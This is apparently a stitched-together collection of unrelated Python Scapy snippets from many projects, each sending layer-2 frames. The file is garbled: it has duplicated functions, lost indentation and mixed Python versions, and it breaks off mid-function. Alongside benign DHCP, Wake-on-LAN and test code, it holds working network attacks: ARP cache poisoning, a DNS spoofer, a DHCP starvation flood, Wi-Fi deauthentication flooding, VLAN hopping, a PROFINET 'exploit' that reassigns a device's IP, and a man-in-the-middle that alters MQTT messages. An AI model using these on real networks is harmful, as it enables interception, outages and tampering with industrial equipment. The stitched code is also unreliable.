def get_rsn_information(self, essid):
rsnInfo = None
sendp(
RadioTap()/
Dot11(addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), subtype=4)/
Dot11ProbeReq()/
Dot11Elt(ID=0, info=essid)/
Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c')/
Dot11Elt(ID=50, info='\x0c\x12\x18\x60'),
iface=self.interface,
verbose=False
)
self.sequence += 1
sniff(iface=self.interface, store=0, timeout=self.timeout, stop_filter=self.__stopfilter__)
if self.lastpacket is None or not self.lastpacket.haslayer(Dot11ProbeResp):
return None
probeResp = self.lastpacket.getlayer(Dot11ProbeResp)
tmp = probeResp.getlayer(Dot11Elt)
while tmp:
if tmp.fields.get('ID') == 48:
rsnInfo = tmp
break
else:
tmp = tmp.payload
if rsnInfo is None:
rsnInfo = '' # Did not find rsnInfo in probe response.
else:
rsnInfo = build_rsn_data(parse_rsn_data(rsnInfo.info))
rsnInfo = '\x30' + chr(len(rsnInfo)) + rsnInfo
return rsnInfo
def send_pkt(self, intf='', count=1):
self.print_summary()
if intf != '':
# fix fortville can't receive packets with 00:00:00:00:00:00
if self.pkt.getlayer(0).src == "00:00:00:00:00:00":
self.pkt.getlayer(0).src = get_if_hwaddr(intf)
sendp(self.pkt, iface=intf, count=count)
def getRSNInformation(self, essid):
sendp( RadioTap()/
Dot11(addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__unfuckupSC__(), subtype=4)/
Dot11ProbeReq()/
Dot11Elt(ID=0, info=essid)/
Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c')/
Dot11Elt(ID=50, info='\x0c\x12\x18\x60'),
iface=self.interface, verbose=False)
self.sequence += 1
sniff(iface=self.interface, store=0, timeout=self.timeout, stop_filter=self.__stopfilter__)
if self.lastpacket == None or not self.lastpacket.haslayer('Dot11ProbeResp'):
return None
probeResp = self.lastpacket.getlayer(Dot11ProbeResp)
tmp = probeResp.getlayer(Dot11Elt)
while tmp:
if tmp.fields.get('ID') == 48:
rsnInfo = tmp
break
else:
tmp = tmp.payload
if rsnInfo == None:
rsnInfo = '' # we didn't find it in the probe response, so we'll return an empty string
else:
rsnInfo = parseRSNData(rsnInfo.info)
rsnInfo = buildRSNData(rsnInfo)
rsnInfo = '\x30' + chr(len(rsnInfo)) + rsnInfo
return rsnInfo
def send_probe_req(self, bssid, essid):
"""Send a probe request to the specified AP"""
src = RandMAC() if self.mac is None else self.mac
self.logger.info('[!] Sending Broadcast Probe Request: SRC=[%s] -> BSSID: %s ESSID: %s' % (src, bssid, essid))
param = Dot11ProbeReq()
essid = Dot11Elt(ID='SSID', info=essid)
rates = Dot11Elt(ID='Rates', info="\x03\x12\x96\x18\x24\x30\x48\x60")
dsset = Dot11Elt(ID='DSset', info='\x01')
pkt = RadioTap() / Dot11(type=0, subtype=4, addr1='ff:ff:ff:ff:ff:ff', addr2=src,
addr3='ff:ff:ff:ff:ff:ff') / param / essid / rates / dsset
try:
sendp(pkt, verbose=0)
except:
return
print ("Probing network '%s (%s)'\n" % (bssid, essid))
try:
# Build a probe request packet with a SSID and a WPS information element
dst = mac2str(bssid)
src = mac2str("ff:ff:ff:ff:ff:ff")
packet = Dot11(addr1=dst, addr2=src, addr3=dst) / Dot11ProbeReq()
packet = packet / Dot11Elt(ID=0, len=len(essid), info=essid) / Dot11Elt(ID=221, len=9,
info="%s\x10\x4a\x00\x01\x10" % self.wps_parser.WPS_ID)
# Send it!
send(packet, verbose=0)
# self.probedNets[bssid] = None
except Exception, e:
print 'Failure sending probe request to', essid, ':', e
def send_frame(self, frame_body):
PACKET = Ether()
PACKET.length = 64
PACKET.dst = self.dst
PACKET.src = self.getHwAddr(self.interface)
if self.stag:
# WARNING: September/2016: This should be 0x88a8, but the Intel 10G
# hardware I am currently using does not support receiving a TPID of
# 0x88a8. So, I send double CTAGs, and I usually set this to 0x8100.
# (NOTE: The Intel hardware can send a TPID of 0x88a8)
PACKET.type = 0x8100
if self.ctag:
PACKET/=Dot1Q(type=0x8100,vlan=int(self.stag))
PACKET/=Dot1Q(type=self.etype,vlan=int(self.ctag))
else:
PACKET/=Dot1Q(type=self.etype,vlan=int(self.stag))
else:
if self.ctag:
PACKET.type = 0x8100
PACKET/=Dot1Q(type=self.etype,vlan=int(self.ctag))
else:
PACKET.type = self.etype
# PACKET/=Dot1Q(type=self.etype, vlan=int(self.ctag))
PACKET/=SlowProtocolsSubtype()/FlagsBytes()/OAMPDU()
PACKET/=frame_body
PACKET/=EndOfPDU()
if (self.verbose == True):
PACKET.show()
print '###[ Frame Length %d (before padding) ]###' % len(PACKET)
if (self.hexdump == True):
print hexdump(PACKET)
if (self.dryrun != True):
sendp(PACKET, iface=self.interface, verbose=self.verbose)
time.sleep(self.sleep)
return PACKET
def send_packet_to_sw(self, ryu_packet):
self.logger.debug("")
sendpkt = scapy_packet.Packet(ryu_packet.data)
# send of scapy
sendrecv.sendp(sendpkt)
self.logger.info("sent 1 packet to switch.")
def run(self): """ This is the thread routine that handles probe requests and sends probe responses when appropriate. """ while not self.__shutdown__: sniff(iface=self.interface, store=0, timeout=RESPONSE_TIMEOUT, stop_filter=self.__stopfilter__) if self.lastpacket: if self.lastpacket.haslayer(Dot11ProbeReq): ssid = None tmp = self.lastpacket.getlayer(Dot11ProbeReq) while tmp: tmp = tmp.payload if tmp.fields['ID'] == 0: ssid = tmp.info break if ssid is None: continue elif ssid == '' and self.essid: ssid = self.essid if self.essid is None or self.essid == ssid: self.probe_response_template.getlayer(Dot11).addr1 = get_source(self.lastpacket) self.probe_response_template.getlayer(Dot11Elt).info = ssid sendp(self.probe_response_template, iface=self.interface, verbose=False) self.lastpacket = None continue clientMAC = get_source(self.lastpacket) if not self.client_queue.full(): self.client_queue.put(clientMAC, False) self.lastpacket = None continue
def close(self):
"""
Disassociate from the access point, This does not veify that
the AP received the message and should be considred a
best-effort attempt.
errDict = {
-1:"Not Connected",
0:"No Error"
}
"""
if not self.connected:
return -1
sendp(
RadioTap()/
Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=0, subtype=12)/
Dot11Disas(reason=3),
iface=self.interface,
verbose=False
)
sendp(
RadioTap()/
Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=0, subtype=12)/
Dot11Disas(reason=3),
iface=self.interface,
verbose=False
)
self.connected = False
return 0
def run(self): """ This is the thread routine that broadcasts the SSID. """ while not self.__shutdown__: self.beacon.getlayer(Dot11).SC = self.__fixSC__() sendp(self.beacon, iface=self.interface, verbose=False) time.sleep(self.broadcast_interval)
def __thread_sendp__(self, payload): """ Sendp function used for opening thread, sending packets, and closing thread """ quick_sniff = threading.Thread(target=self.__thread_sniff__) quick_sniff.start() time.sleep(0.1) sendp(payload, iface=self.interface, verbose=False) quick_sniff.join()
def start(self, count=[0, 100]):
for i in range(count[0], count[1]):
sendp(self.pyload(),
verbose=0,
return_packets=False,
inter=0,
loop=0)
print(
f"\033[41m PACKET \033[0m Injection fake routers {self.IProuter} {self.InjectFackeRouter} \033[31m{i}\033[0m"
)
def VlanNumer(dstMac, startVlanID, endVlanID):
while 1 < endVlanID:
sendp(
Ether(dst=dstMac) / Dot1Q(vlan=1) / Dot1Q(vlan=startVlanID) /
ARP(op='who-has', psrc=psrc, pdst=pdst))
startVlanID = startVlanID + 1
if startVlanID == endVlanID:
break
else:
continue
def discover_local_device(self):
self.sniff_mac_address = get_if_hwaddr(self.nic)
p = threading.Thread(target=self.sniff_answer)
p.setDaemon(True)
p.start()
# wait sniff start
time.sleep(0.2)
packet = Ether(src=self.sniff_mac_address, dst="ff:ff:ff:ff:ff:ff")/IP(src=get_if_addr(self.nic), dst="255.255.255.255")/UDP(sport=44818, dport=44818)/ENIPHeader(Command=0x0063)
sendp(packet, iface=self.nic)
self.sniff_finished.wait(self.timeout + 1)
def send_packet_to_sw(self, ryu_packet, mc_addr, vid):
self.logger.debug("")
sendpkt = scapy_packet.Packet(ryu_packet.data)
# send of scapy
sendrecv.sendp(
sendpkt, iface=self.config[const.MLD_ESW_IFNAME], verbose=0)
self.logger.info(
"send to switch. [multicast_address]:'%s' [c_tag_id]:%s ",
mc_addr, vid)
def send_request(self, server_mac=BROADCAST_MAC, server_ip=BROADCAST_ADDR,
client_ip=META_ADDR):
pkt = self.gen_request(server_mac=server_mac, server_ip=server_ip,
client_ip=client_ip)
sendp(pkt)
self.time_sent_request = now()
logger.info('DHCPREQUEST of %s on %s to %s port %s' %
(self.iface, self.client_ip_offered,
server_ip, self.server_port))
logger.debug("Sent request.")
def negotiate_trunk(iface=conf.iface, mymac=str(RandMAC())):
print "Trying to negotiate a trunk on interface %s" % iface
p = Dot3(src=mymac,
dst="01:00:0c:cc:cc:cc") / LLC() / SNAP() / DTP(tlvlist=[
DTPDomain(),
DTPStatus(),
DTPType(),
DTPNeighbor(neighbor=mymac)
])
sendp(p)
def exploit(self, target_mac):
packet = Ether(src=self.sniff_mac_address, dst=target_mac, type=0x8892) / \
ProfinetIO(frameID=0xFEFD) / PNDCPHeader(ServiceID=4, ServiceType=0,
DCPBlocks=[PNDCPSetRequest(Option=0x01, SubOption=0x02)])
packet[PNDCPHeader].DCPBlocks[
0].DCPBlock = PNDCPSetIPParameterRequestBlock(
IPaddress=self.target_ip,
Subnetmask=self.target_netmask,
StandardGateway=self.target_gateway)
sendp(packet, iface=self.nic)
def process_packet(self, packet):
# Setting attacker's ARP cache is usually not required
# conf.netcache.arp_cache[self.victims[0][0]] = self.victims[0][1]
# conf.netcache.arp_cache[self.victims[1][0]] = self.victims[1][1]
if Ether in packet:
if packet[Ether].src == ATTACKER_MAC:
return
def alter_packet(pkt):
if Ether in pkt and IP in pkt:
l2 = pkt[Ether]
# Check if RFID reader sent request
if l2.src == self.victims[0][1] and l2.dst == ATTACKER_MAC:
pkt[Ether].src = ATTACKER_MAC
pkt[Ether].dst = self.victims[1][1]
# Check if MQTT Publish layer in packet
if MQTTPublish in pkt:
mqtt_pub = pkt[MQTTPublish]
topic = mqtt_pub.topic
value = mqtt_pub.value
length = mqtt_pub.underlayer.len
candies = ["Mint", "Cherry"]
if topic == "candy":
if value in candies:
idx = candies.index(value)
# Inverse candy selection
new_value = candies[(idx + 1) % 2]
pkt[MQTTPublish].value = new_value
print pkt[MQTTPublish].value
pkt[MQTTPublish].underlayer.len = length - len(
value) + len(new_value)
print pkt[MQTTPublish].underlayer.len
# Remove checksum and length of packet
if IP in pkt:
del packet[IP].chksum
del packet[IP].len
pkt.show2()
# Delete checksum, otherwise server/client impl. may reject packet
if TCP in pkt:
del packet[TCP].chksum
elif l2.src == self.victims[1][1] and l2.dst == ATTACKER_MAC:
pkt[Ether].src = ATTACKER_MAC
pkt[Ether].dst = self.victims[0][1]
return pkt
pk = alter_packet(packet)
if pk is not None:
sendp(pk, iface=IFACE, verbose=0)
def send_dhcp_packet(self,
mac: MacAddress,
state: DHCPState,
dhcp_desc: DHCPDescriptor = None):
"""
Send DHCP packet and record state in dhcp_client_state.
Args:
mac: MAC address of interface
state: state of DHCP packet
dhcp_desc: DHCP protocol state.
Returns:
"""
ciaddr = None
# generate DHCP request packet
if state == DHCPState.DISCOVER:
dhcp_opts = [("message-type", "discover")]
dhcp_desc = DHCPDescriptor(mac=mac,
ip="",
state_requested=DHCPState.DISCOVER)
self._msg_xid = self._msg_xid + 1
pkt_xid = self._msg_xid
elif state == DHCPState.REQUEST:
dhcp_opts = [("message-type", "request"),
("requested_addr", dhcp_desc.ip),
("server_id", dhcp_desc.server_ip)]
dhcp_desc.state_requested = DHCPState.REQUEST
pkt_xid = dhcp_desc.xid
ciaddr = dhcp_desc.ip
elif state == DHCPState.RELEASE:
dhcp_opts = [("message-type", "release"),
("server_id", dhcp_desc.server_ip)]
dhcp_desc.state_requested = DHCPState.RELEASE
self._msg_xid = self._msg_xid + 1
pkt_xid = self._msg_xid
ciaddr = dhcp_desc.ip
else:
LOG.warning("Unknown egress request mac %s state %s", str(mac),
state)
return
dhcp_opts.append("end")
with self._dhcp_notify:
self.dhcp_client_state[mac.as_redis_key()] = dhcp_desc
pkt = Ether(src=str(mac), dst="ff:ff:ff:ff:ff:ff")
pkt /= IP(src="0.0.0.0", dst="255.255.255.255")
pkt /= UDP(sport=68, dport=67)
pkt /= BOOTP(op=1, chaddr=mac.as_hex(), xid=pkt_xid, ciaddr=ciaddr)
pkt /= DHCP(options=dhcp_opts)
LOG.debug("DHCP pkt %s", pkt.show(dump=True))
sendp(pkt, iface=self._dhcp_interface, verbose=0)
def send(self, data, dot11_type=2, dot11_subtype=8, FCfield=0x02, raw=True): """ Send a frame, if raw, insert the data above the Dot11QoS layer. """ frame = RadioTap()/Dot11(FCfield=FCfield, addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=dot11_type, subtype=dot11_subtype) if raw: frame = frame/data else: frame = frame/Dot11QoS()/data sendp(frame, iface=self.interface, verbose=False) self.sequence += 1
def scan_target_ip(self, target_mac):
p = threading.Thread(target=self.sniff_answer)
p.setDaemon(True)
p.start()
packet = Ether(src=self.sniff_mac_address, dst=target_mac, type=0x8892) / ProfinetIO(frameID=0xFEFE) / \
PNDCPHeader(ServiceID=5, ServiceType=0, DCPBlocks=[PNDCPIdentRequest()])
sendp(packet, iface=self.nic)
self.sniff_finished.wait(self.timeout + 1)
unique_device = [list(x) for x in set(tuple(x) for x in self.result)]
print(tabulate.tabulate(unique_device, headers=TABLE_HEADER))
print('\n')
def send(self, data, dot11_type=2, dot11_subtype=8, FCfield=0x02, raw=True): """ Send a frame, if raw, insert the data above the Dot11QoS layer. """ frame = RadioTap()/Dot11(FCfield=FCfield, addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=dot11_type, subtype=dot11_subtype) if raw: frame = frame/data else: frame = frame/Dot11QoS()/data sendp(frame, iface=self.interface, verbose=False) self.sequence += 1
def send_discover(self):
pkt = self.gen_discover()
# Only when sending discover from RENEWING
# The client records the local time at which the DHCPREQUEST
# message is sent for computation of the lease expiration time
# self.time_request = now()
sendp(pkt)
self.cur_discover_retry += 1
logger.info('DHCPDISCOVER on %s to %s port %s' %
(self.iface, BROADCAST_ADDR, SERVER_PORT))
logger.debug("Sent discover.")
def scapy_arp(self, ip: str) -> None:
"""
This function send an ARP request with Scapy.
"""
debug(f"Send ARP packet for {ip!r}")
sendp(
Ether(dst="ff:ff:ff:ff:ff:ff", src=self.mac) /
ARP(op=1, psrc=self.ip, pdst=ip),
iface=self.iface,
verbose=False,
)
def dhcp_flood(**kwargs):
iface = kwargs["interface"]
count = kwargs["count"]
unique_hexdigits = str.encode("".join(set(string.hexdigits.lower())))
packet = (l2.Ether(dst="ff:ff:ff:ff:ff:ff") /
inet.IP(src="0.0.0.0", dst="255.255.255.255") /
inet.UDP(sport=68, dport=67) /
dhcp.BOOTP(chaddr=volatile.RandString(12, unique_hexdigits)) /
dhcp.DHCP(options=[("message-type", "discover"), "end"]))
sendrecv.sendp(packet, iface=iface, count=count)
def send_discover(self):
"""Send discover."""
assert self.client
assert self.current_state == STATE_INIT or \
self.current_state == STATE_SELECTING
pkt = self.client.gen_discover()
sendp(pkt)
# FIXME:20 check that this is correct,: all or only discover?
if self.discover_attempts < MAX_ATTEMPTS_DISCOVER:
self.discover_attempts += 1
timeout = gen_timeout_resend(self.discover_attempts)
self.set_timeout(self.current_state, self.timeout_selecting, timeout)
def send_dns_reply(p):
if IPv6 in p:
ip = p[IPv6]
resp = Ether(dst=p.src, src=p.dst) / IPv6(
dst=ip.src, src=ip.dst) / UDP(dport=ip.sport, sport=ip.dport)
else:
ip = p[IP]
resp = Ether(dst=p.src, src=p.dst) / IP(dst=ip.src, src=ip.dst) / UDP(
dport=ip.sport, sport=ip.dport)
dns = p[DNS]
#only reply to IN, and to messages that dont contain answers
if dns.qd.qclass != 1 or dns.qr != 0:
return
#Make sure the requested name is in unicode here
reqname = dns.qd.qname.decode()
#A request
if dns.qd.qtype == 1:
rdata = config.selfipv4
#AAAA request
elif dns.qd.qtype == 28:
rdata = config.selfaddr
#PTR request
elif dns.qd.qtype == 12:
# To reply for PTR requests for our own hostname
# comment the return statement
return
if reqname == config.selfptr:
#We reply with attacker.domain
rdata = 'attacker.%s' % config.localdomain
else:
return
#Not handled
else:
return
if should_spoof_dns(reqname):
resp /= DNS(id=dns.id,
qr=1,
qd=dns.qd,
an=DNSRR(rrname=dns.qd.qname,
ttl=100,
rdata=rdata,
type=dns.qd.qtype))
try:
sendp(resp, iface=config.default_if, verbose=False)
except socket.error as e:
print('Error sending spoofed DNS')
print(e)
if config.debug:
ls(resp)
print('Sent spoofed reply for %s to %s' % (reqname, ip.src))
else:
if config.verbose or config.debug:
print('Ignored query for %s from %s' % (reqname, ip.src))
def sigint_handler(signum, frame): # 定义处理方法
global psrc, hwsrc, mac_src, hwdst, src1, dst1 # 引入全局变量
print("\n执行恢复操作!!!")
# 发送ARP数据包,恢复被毒化设备的ARP缓存
sendp(Ether(src=hwsrc, dst=mac_src) /
ARP(op=2, hwsrc=hwdst, hwdst=mac_src, psrc=src1, pdst=dst1),
iface=scapy_iface(ifname1),
verbose=False)
time.sleep(1)
print("已经恢复 " + src1 + " ARP缓存")
# 退出程序,跳出while True
sys.exit()
def send_packets_by_scapy(self, **kwargs):
tx_iface = kwargs.get('port topo')[0]
# set interface ready to send packet
cmd = "ifconfig {0} up".format(tx_iface)
self.parent.tester.send_expect(cmd, '# ', 30)
send_pkts = kwargs.get('stream')
# stream config
stream_configs = kwargs.get('traffic configs')
count = stream_configs.get('count')
interval = stream_configs.get('interval', 0.01)
# run traffic
sendp(send_pkts, iface=tx_iface, inter=interval, verbose=False,
count=count)
def replay_goose(interface):
pcap_name = input(
"\n[*] Enter the name of the PCAP file to be used (without extension): "
)
packets = rdpcap(pcap_name + '.pcap')
for packet in packets:
if packet.haslayer(
Ether
) == 1: # and packet.haslayer(Dot1Q) == 1 and packet.haslayer(Raw) == 1
print(packet)
sendp(packet, iface=interface)
time.sleep(0.01)
def flood_ap(self, _pkt, _br):
if self.verbose:
self.pull.up("%d %s (%s) %s<>%s %s (%s) %s[DEAUTHENTICATION]%s" % (self.deauth, self.ap.replace(':', '').upper(),\
self.pull.DARKCYAN+org(self.ap).org+self.pull.END, \
self.pull.RED, self.pull.END, _br.replace(':', '').upper(), \
self.pull.DARKCYAN+org(self.cl).org+self.pull.END, \
self.pull.BLUE, self.pull.END ))
else:
self.pull.up("%d %s %s<>%s %s %s[DEAUTHENTICATION]%s" % (self.deauth, self.ap.replace(':', '').upper(),\
self.pull.RED, self.pull.END, _br.replace(':', '').upper(), \
self.pull.BLUE, self.pull.END ))
sendp(_pkt, iface=self.iface, count=self.deauth, verbose=False)
time.sleep(1)
def arp_response(src: str,
src_mac: str,
dst: str,
dst_mac: str,
count=3,
interval=0.1) -> None:
""" Sends an ARP response """
for i in range(count):
sendp(l2.Ether(dst=dst_mac, src=src_mac) / l2.ARP(
op="is-at", hwsrc=src_mac, psrc=src, hwdst=dst_mac, pdst=dst),
verbose=False)
if interval > 0:
sleep(interval)
def connect(self, essid, rsnInfo = ''):
"""
Connect/Associate with an access point.
errDict = {
-1:"Already Connected",
0:"No Error",
1:"Failed To Get Probe Response",
2:"Failed To Get Authentication Response",
3:"Failed To Get Association Response",
4:"Authentication Request Received Fail Response",
5:"Association Request Received Fail Response"
}
"""
# Dot11 Probe Request (to get authentication information if applicable)
if rsnInfo == None: # None explicitly means go get it, leave it '' to proceed with out it
rsnInfo = self.getRSNInformation(essid)
# Dot11 Authentication Request
sendp( RadioTap()/
Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__unfuckupSC__())/
Dot11Auth(seqnum=1),
iface=self.interface, verbose=False)
self.sequence += 1
sniff(iface=self.interface, store=0, timeout=self.timeout, stop_filter=self.__stopfilter__)
if self.lastpacket == None or not self.lastpacket.haslayer('Dot11Auth'):
return 2
if self.lastpacket.getlayer('Dot11Auth').status != 0:
return 4
# Dot11 Association Request
sendp( RadioTap()/
Dot11(addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__unfuckupSC__(), subtype=0)/
Dot11AssoReq(cap='ESS+short-preamble+short-slot', listen_interval=10)/
Dot11Elt(ID=0, info=essid)/
Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c')/
Dot11Elt(ID=50, info='\x0c\x12\x18\x60')/
rsnInfo,
iface=self.interface, verbose=False)
self.sequence += 1
sniff(iface=self.interface, store=0, timeout=self.timeout, stop_filter=self.__stopfilter__)
if self.lastpacket == None or not self.lastpacket.haslayer(Dot11AssoResp):
return 3
if self.lastpacket.getlayer(Dot11AssoResp).status != 0:
return 5
self.connected = True
self.sequence = 0 # reset it
return 0
def send_request(self):
"""Send request.
[:rfc:`2131#section-3.1`]::
a client retransmitting as described in section 4.1 might retransmit
the DHCPREQUEST message four times, for a total delay of 60 seconds
.. todo::
- The maximum number of retransmitted REQUESTs is per state or in
total?
- Are the retransmitted REQUESTs independent to the retransmitted
DISCOVERs?
"""
assert self.client
if self.current_state == STATE_BOUND:
pkt = self.client.gen_request_unicast()
else:
pkt = self.client.gen_request()
sendp(pkt)
logger.debug('Modifying FSM obj, setting time_sent_request.')
self.time_sent_request = nowutc()
logger.info('DHCPREQUEST of %s on %s to %s port %s',
self.client.iface, self.client.client_ip,
self.client.server_ip, self.client.server_port)
# NOTE: see previous TODO, maybe the MAX_ATTEMPTS_REQUEST needs to be
# calculated per state.
if self.request_attempts < MAX_ATTEMPTS_REQUEST:
self.request_attempts *= 2
logger.debug('Increased request attempts to %s',
self.request_attempts)
if self.current_state == STATE_RENEWING:
timeout_renewing = gen_timeout_request_renew(self.client.lease)
self.set_timeout(self.current_state,
self.timeout_request_renewing,
timeout_renewing)
elif self.current_state == STATE_REBINDING:
timeout_rebinding = gen_timeout_request_rebind(self.client.lease)
self.set_timeout(self.current_state,
self.timeout_request_rebinding,
timeout_rebinding)
else:
timeout_requesting = \
gen_timeout_resend(self.request_attempts)
self.set_timeout(self.current_state,
self.timeout_requesting,
timeout_requesting)
def send_magic_packet():
# マジックパケットの仕様に従い、文字列でペイロードを準備
# https://ja.wikipedia.org/wiki/Wake-on-LAN
str_payload = PREFIX_PAYLOAD + (TARGET_MAC_ADDRESS.replace(':', '') * 16)
# Python2でしか動作させないので、decode('hex')を使う
# https://stackoverflow.com/questions/443967/how-to-create-python-bytes-object-from-long-hex-string
hex_payload = str_payload.decode('hex')
ether_layer = Ether(dst=BROADCAST_MAC_ADDRESS)
ip_layer = IP(dst=LIMITED_BROADCAST_IP_ADDRESS)
udp_layer = UDP()
raw_layer = Raw(load=hex_payload)
magic_packet = ether_layer / ip_layer / udp_layer / raw_layer
sendp(magic_packet)
def spoof(native_mac, target_mac, gateway_mac):
# Specify the ARP source MAC address to prevent using the wrong interface MAC address
sendp(Ether(src=native_mac, dst=target_mac) / ARP(op=2,
psrc=gateway_ip,
hwsrc=native_mac,
pdst=target_ip,
hwdst=target_mac),
iface=interface)
sendp(Ether(src=native_mac, dst=gateway_mac) / ARP(op=2,
psrc=target_ip,
hwsrc=native_mac,
pdst=gateway_ip,
hwdst=gateway_mac),
iface=interface)
def dhcpRequest(dhcp_offer, src_mac_random, interface):
transaction_id = dhcp_offer[0][BOOTP].xid
server_id = dhcp_offer[0][DHCP].options[1][1]
requested_addr = dhcp_offer[0][BOOTP].yiaddr
print(requested_addr)
options = [("message-type", "request"), ("server_id", server_id),
("requested_addr", requested_addr), ("end", "0")]
dhcp_request = Ether(dst='ff:ff:ff:ff:ff:ff', src=src_mac_random) \
/ IP(src='0.0.0.0', dst='255.255.255.255') \
/ UDP(sport=68, dport=67) \
/ BOOTP(chaddr=[mac2str(src_mac_random)], xid=transaction_id) \
/ DHCP(options=options)
sendp(dhcp_request, iface=interface)
return requested_addr
def arpcachepoison(target, victim, interval=60):
"""Poison target's cache with (your MAC,victim's IP) couple
arpcachepoison(target, victim, [interval=60]) -> None
"""
tmac = getmacbyip(target)
p = Ether(dst=tmac) / ARP(op="who-has", psrc=victim, pdst=target)
try:
while True:
sendp(p, iface_hint=target)
if conf.verb > 1:
os.write(1, b".")
time.sleep(interval)
except KeyboardInterrupt:
pass
def dev_conn(self):
auth_catcher = threading.Thread(target=self.auth_sniffer, args=(self.iface,), name="Authentication Catcher")
auth_catcher.daemon = True
auth_catcher.start()
while not self.__AUTH_STEP:
self._randn_(3)
self.pull.up("%i Frames %s > %s %s[Open Authentication]%s" % (self._randn, self.cl.replace(':', '').upper(), self.ap.replace(':', '').upper(), self.pull.BLUE, self.pull.END))
sendp(self.auth, iface=self.iface, count=2, verbose=False)
if not self.__AUTH_STATUS:
break
time.sleep(1)
return self.__AUTH_STEP
def arpcachepoison(target, victim, interval=60):
"""Poison target's cache with (your MAC,victim's IP) couple
arpcachepoison(target, victim, [interval=60]) -> None
"""
tmac = getmacbyip(target)
p = Ether(dst=tmac) / ARP(op="who-has", psrc=victim, pdst=target)
try:
while True:
sendp(p, iface_hint=target)
if conf.verb > 1:
os.write(1, b".")
time.sleep(interval)
except KeyboardInterrupt:
pass
def send_beacon_ex(essid, interface, privacy=PRIVACY_NONE, bssid=None, channel=6):
"""
Convenience function for sending beacons without a thread or creating an instance
"""
if not bssid:
bssid = getHwAddr(interface)
channel = chr(channel)
sequence = randint(1200, 2000)
if privacy in [PRIVACY_NONE, 'none', 'NONE']:
beacon = (
RadioTap()/
Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/
Dot11Beacon(cap='ESS+short-preamble+short-slot')/
Dot11Elt(ID="SSID", info=essid)/
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
Dot11Elt(ID="DSset", info=channel)/
Dot11Elt(ID=42, info="\x04")/
Dot11Elt(ID=47, info="\x04")/
Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
)
elif privacy in [PRIVACY_WEP, 'wep', 'WEP']:
beacon = (
RadioTap()/
Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/
Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/
Dot11Elt(ID="SSID", info=essid)/
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
Dot11Elt(ID="DSset", info=channel)/
Dot11Elt(ID=42, info="\x04")/
Dot11Elt(ID=47, info="\x04")/
Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
)
elif privacy in [PRIVACY_WPA, 'wpa', 'WPA']:
beacon = (
RadioTap()/
Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/
Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/
Dot11Elt(ID="SSID", info=essid)/
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
Dot11Elt(ID="DSset", info=channel)/
Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/
Dot11Elt(ID=42, info="\x00")/
Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/
Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00")
)
else:
raise Exception('Invalid privacy setting')
sendp(beacon, iface=interface, verbose=False)
def send_beacon_ex(essid, interface, privacy=PRIVACY_NONE, bssid=None, channel=6):
"""
Convenience function for sending beacons without a thread or creating an instance
"""
if not bssid:
bssid = getHwAddr(interface)
channel = chr(channel)
sequence = randint(1200, 2000)
if privacy in [PRIVACY_NONE, 'none', 'NONE']:
beacon = (
RadioTap()/
Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/
Dot11Beacon(cap='ESS+short-preamble+short-slot')/
Dot11Elt(ID="SSID", info=essid)/
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
Dot11Elt(ID="DSset", info=channel)/
Dot11Elt(ID=42, info="\x04")/
Dot11Elt(ID=47, info="\x04")/
Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
)
elif privacy in [PRIVACY_WEP, 'wep', 'WEP']:
beacon = (
RadioTap()/
Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/
Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/
Dot11Elt(ID="SSID", info=essid)/
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
Dot11Elt(ID="DSset", info=channel)/
Dot11Elt(ID=42, info="\x04")/
Dot11Elt(ID=47, info="\x04")/
Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
)
elif privacy in [PRIVACY_WPA, 'wpa', 'WPA']:
beacon = (
RadioTap()/
Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/
Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/
Dot11Elt(ID="SSID", info=essid)/
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/
Dot11Elt(ID="DSset", info=channel)/
